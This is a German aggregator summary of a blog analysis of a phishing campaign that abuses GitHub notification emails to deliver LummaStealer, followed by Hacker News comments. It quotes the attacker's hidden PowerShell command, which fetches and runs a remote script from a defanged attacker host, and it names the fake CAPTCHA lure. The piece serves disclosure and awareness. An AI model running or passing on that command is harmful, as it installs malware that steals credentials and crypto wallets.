Malware-Verbreitung durch Missbrauch von GitHub-Benachrichtigungs-E-Mails

 (ianspence.com)
1 Punkte von GN⁺ 2024-09-20 | 1 Kommentare | Auf WhatsApp teilen
  • Als Open-Source-Entwickler erhält man häufig E-Mails von GitHub
  • Die meisten E-Mails sind Benachrichtigungen über Interaktionen von GitHub-Nutzern
  • Einige E-Mails geben sich jedoch als GitHub-Sicherheitsmeldungen aus und verleiten zum Download von Malware

Angriffsmethode

  1. Der Angreifer erstellt mit einem temporären GitHub-Konto ein Issue in einem öffentlichen Repository
  2. Der Angreifer löscht das Issue schnell wieder
  3. Der Repository-Eigentümer erhält eine Benachrichtigungs-E-Mail
  4. Er klickt auf den Link in der E-Mail
  5. Er infiziert sein System, indem er den Anweisungen folgt

Analyse der E-Mail-Nachricht

  • Der Inhalt der E-Mail ist größtenteils vom Angreifer kontrollierbar
  • In der E-Mail steht nicht, dass ein neues Issue erstellt wurde
  • Der Angreifer gibt sich als „Github Security Team“ aus
  • Da die E-Mail tatsächlich von GitHub versendet wird, besteht sie Phishing-Prüfungen

Verbesserungsmöglichkeiten für GitHub

  • Mehr Kontext in der E-Mail könnte die Wirksamkeit des Angriffs verringern
  • Von Angreifern kontrollierbare Inhalte sollten reduziert und der Absender klarer ausgewiesen werden

Website

  • Folgt man dem Link in der E-Mail, gelangt man auf eine CAPTCHA-Seite
  • Die CAPTCHA-Seite verleitet den Nutzer dazu, einen Befehl in das Windows-Ausführen-Fenster einzugeben

Malware

  • Die Seite kopiert den folgenden Befehl in die Zwischenablage: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • Dieser Befehl startet einen PowerShell-Prozess und lädt ein Skript herunter, das anschließend ausgeführt wird

Phasen der Malware

  1. Über den PowerShell-Befehl wird ein Skript heruntergeladen und ausgeführt
  2. Das Skript lädt eine bösartige ausführbare Datei herunter und startet sie
  3. Die ausführbare Datei ist digital signiert, aber die Signatur ist ungültig
  4. Windows warnt nicht vor einer ungültigen Signatur

Schwachstellen in Windows

  • Das Flag „Mark of the Web“ (MOTW), das aus dem Internet heruntergeladene Dateien kennzeichnet, wird nicht gesetzt
  • Die .NET-Framework-Klasse System.Net.WebClient setzt das MOTW-Flag nicht
  • Wenn das MOTW-Flag nicht gesetzt ist, warnt Windows nicht vor ungültigen Signaturen

Analyse der Malware

  • Die Malware wird in den Speicher geladen und dort ausgeführt
  • Es handelt sich um die Malware LummaStealer, die Kryptowallets, gespeicherte Zugangsdaten und mehr stiehlt

Fazit

  • Ein Angriffsfall, der Schwächen in GitHub-Benachrichtigungs-E-Mails ausnutzt
  • Für die Analyse wurden verschiedene Tools eingesetzt

Zusammenfassung von GN⁺

  • Dieser Artikel behandelt einen Malware-Angriff, der GitHub-Benachrichtigungs-E-Mails missbraucht
  • Zur Verbreitung der Malware werden Schwächen in GitHubs E-Mail-System ausgenutzt
  • Ausgenutzt werden Schwächen beim Windows-Flag „Mark of the Web“ und bei der Prüfung digitaler Signaturen
  • Eingesetzt wird die Malware LummaStealer
  • Die Schwachstellen wurden an GitHub und Microsoft gemeldet
  • Als anderes Projekt mit ähnlicher Funktionalität werden die Analysematerialien von Cyfirma empfohlen

Verwandte Beiträge

1 Kommentare

 
GN⁺ 2024-09-20
Hacker-News-Kommentare

  • Ich habe kürzlich eine sehr überzeugende E-Mail von PayPal erhalten

    • Jemand hat die Zitierfunktion verwendet, um als Firmenname „PayPal need to get in touch about a your recent payment of $499.00, please call +1-....“ einzustellen
    • Die E-Mail kam tatsächlich von PayPal.com, und ich kann nicht nachvollziehen, warum so etwas bei Benutzernamen nicht verwaltet wird
    • Ich habe es gemeldet, aber noch keine Antwort erhalten
    • Die E-Mail war so formatiert, dass sie wie eine echte PayPal-E-Mail aussah, und ich denke, viele Leute würden darauf hereinfallen

  • Ich frage mich, ob Leute wirklich auf solche Betrugsmaschen hereinfallen

    • Nehmen wir an, man weiß, dass die E-Mail von GitHub kam
    • Das erste Warnsignal: Die E-Mail verlinkt auf eine Abwandlung der echten Domain
    • Das zweite Warnsignal: Das Captcha fordert dazu auf, Shell-Befehle einzugeben

  • Ich glaube, Junior-Entwickler könnten auf so einen Betrug hereinfallen

    • „Oh, wie interessant, ein Captcha durch Codeausführung zu lösen!“

  • Eine Webseite sollte nicht in der Lage sein, den Kopieren-/Einfügen-Puffer allein durch einen Klick zu füllen

    • Man sollte nicht auf Links in E-Mails klicken oder dem Inhalt von E-Mails vertrauen
    • Problematisch ist, dass Windows mit einer einzigen Zeile PowerShell-Befehl immer noch Root-Rechte zulässt

  • GitHub sollte verhindern, dass automatisierte Dienste Links in Issues einfügen, ohne sie zu prüfen

    • GitHub sollte die Inhalte, die per E-Mail versendet werden, besser kontrollieren

  • Ich frage mich, ob github-scanner.com immer noch eine bösartige Partei ist

    • Cloudflare hostet das DNS, und es gibt keine Möglichkeit, dieses Problem zu melden

  • Der Angreifer hat das Issue schnell gelöscht

    • Nur Administratoren können Issues löschen
    • Deshalb ist im Repository eine Spur des Issues geblieben

  • Guter Artikel, erinnert mich ein wenig an den Blog von Julia Evans

  • Es ist traurig, dass im Jahr 2024 immer noch Menschen auf die simpelsten Tricks hereinfallen

  • Ich habe heute Morgen so eine Benachrichtigung erhalten und ignoriert

    • Die Benachrichtigung bezog sich auf ein bestimmtes Repository

  • Lesenswert, es zeigt, was sie versucht haben

    • Schon der Link allein kann verdächtig wirken, aber es ist interessant zu sehen, wie jemand der Sache auf den Grund geht

  • Ich habe eine ähnliche GitHub-Benachrichtigungs-E-Mail erhalten

    • Darin hieß es, in einem Repository sei eine Schwachstelle gefunden worden, aber ich habe nicht geklickt
    • Ich habe nicht geklickt, weil ich ein fauler Programmierer bin